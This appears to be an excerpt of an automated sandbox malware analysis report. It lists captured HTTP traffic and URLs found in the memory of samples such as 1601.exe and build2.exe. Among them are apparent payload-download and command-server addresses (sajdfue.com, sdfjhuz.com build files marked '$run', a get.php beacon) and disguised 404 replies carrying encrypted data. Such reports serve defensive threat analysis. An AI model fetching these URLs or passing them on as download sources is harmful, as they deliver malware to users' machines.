Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 35 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 83 54 0e 7d 17 be a1 83 bd ad 1d a1 52 dd 6d ba 19 59 9d 09 f4 a6 2d af 7b 64 0f a5 b4 89 18 c9 2d 84 1b 8f be 42 c3 5c 9a d3 f7 27 69 98 d0 4b 6b 80 a7 b4 0e 89 d3 cf 37 b2 33 ce 98 77 4d 1a 7d 4b 47 98 fc 64 a0 f2 5c 90 0d 0a 30 0d 0a 0d 0a Data Ascii: 5eI:82OT}RmY-{d-B\'iKk73wM}KGd\0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 63 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 51 de 4b d1 fb 25 83 2a e8 ae 95 58 2d e4 be 41 2d fa a5 b4 6a f3 91 be 5a a8 74 9e c9 37 40 5a 3c 0d 4f df a6 3d fd dd 47 87 ad d3 1a d1 3b 93 84 69 77 3c f0 29 76 94 c8 9e 94 25 ff 60 18 88 4a ef 0a ea e3 d2 63 d1 82 f6 31 db 7f f3 ae 9a e0 5c 8c c0 97 18 1f c4 5f fe bc bf c1 fa ad 12 15 a9 2e 8b de 22 82 7f 65 46 b7 8d ab e6 a9 41 b9 1d 34 99 97 be ea 8b e6 78 82 74 34 36 6a 3a eb 87 09 c7 29 aa af ae 2e c0 d5 85 04 4e 30 63 cc 0d 0a 30 0d 0a 0d 0a Data Ascii: c5I:82OB%,YR("XQK%*X-A-jZt7@Z<O=G;iw<)v%`Jc1\_."eFA4xt46j:).N0c0

Source: build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.1430666341.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1430666341.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.0000000009037000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: build2.exe, 00000013.00000003.2114989353.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159513873.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.1430666341.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1430666341.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.0000000009037000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: build2.exe, 00000013.00000003.2114989353.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159513873.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.1430666341.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1430666341.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1430666341.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.0000000009037000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: build2.exe, 00000013.00000003.2114989353.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159513873.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 1601.exe, 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 1601.exe, 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, 1601.exe, 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000027.00000002.2632605296.0000000004CE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.aS
Source: explorer.exe, 00000027.00000002.2632605296.0000000004CE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.ad
Source: explorer.exe, 00000027.00000002.2632605296.0000000004CE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c
Source: explorer.exe, 00000027.00000002.2632605296.0000000004CE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.b
Source: explorer.exe, 00000027.00000002.2632605296.0000000004CE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.micr9
Source: explorer.exe, 00000002.00000000.1430666341.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1430666341.000000000952D000.00000004.00000001.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2635780083.0000000009037000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: build2.exe, 00000013.00000003.2114989353.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159513873.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: build2.exe, 00000013.00000003.2114848022.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2021277543.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.1428012829.000000000305D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2628394160.00000000030B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/files/1/build3.exe
Source: 1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2628394160.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/files/1/build3.exe$run
Source: 1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/files/1/build3.exerun381
Source: 1601.exe, 00000010.00000002.2621304334.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.000000000090E000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2620858851.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/test1/get.php
Source: 1601.exe, 00000011.00000002.2620858851.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000011.00000002.2620858851.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD
Source: 1601.exe, 00000010.00000002.2621304334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=true
Source: 1601.exe, 00000010.00000002.2621304334.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=trueL3V9
Source: 1601.exe, 00000010.00000002.2621304334.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=trueu
Source: 1601.exe, 00000011.00000002.2620858851.00000000007C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDDE
Source: 1601.exe, 00000011.00000002.2620858851.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sajdfue.com/test1/get.phpy
Source: explorer.exe, 00000002.00000000.1427818768.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1429897160.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1429876223.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: 1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2628394160.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, 1601.exe, 00000010.00000002.2621304334.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: 1601.exe, 00000010.00000002.2621304334.0000000000901000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exerunerW
Source: 1601.exe, 00000010.00000002.2621304334.000000000090E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exey=
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 1601.exe, 00000010.00000003.1827663370.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000002.00000000.1428983456.00000000070CE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: build2.exe, 00000013.00000003.2114989353.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2159513873.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 1601.exe, 00000010.00000003.1828265822.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: 1601.exe, 00000010.00000003.1828338909.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: build2.exe, 00000013.00000002.2301766220.000000006CE2D000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 1601.exe, 00000010.00000003.1828419283.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
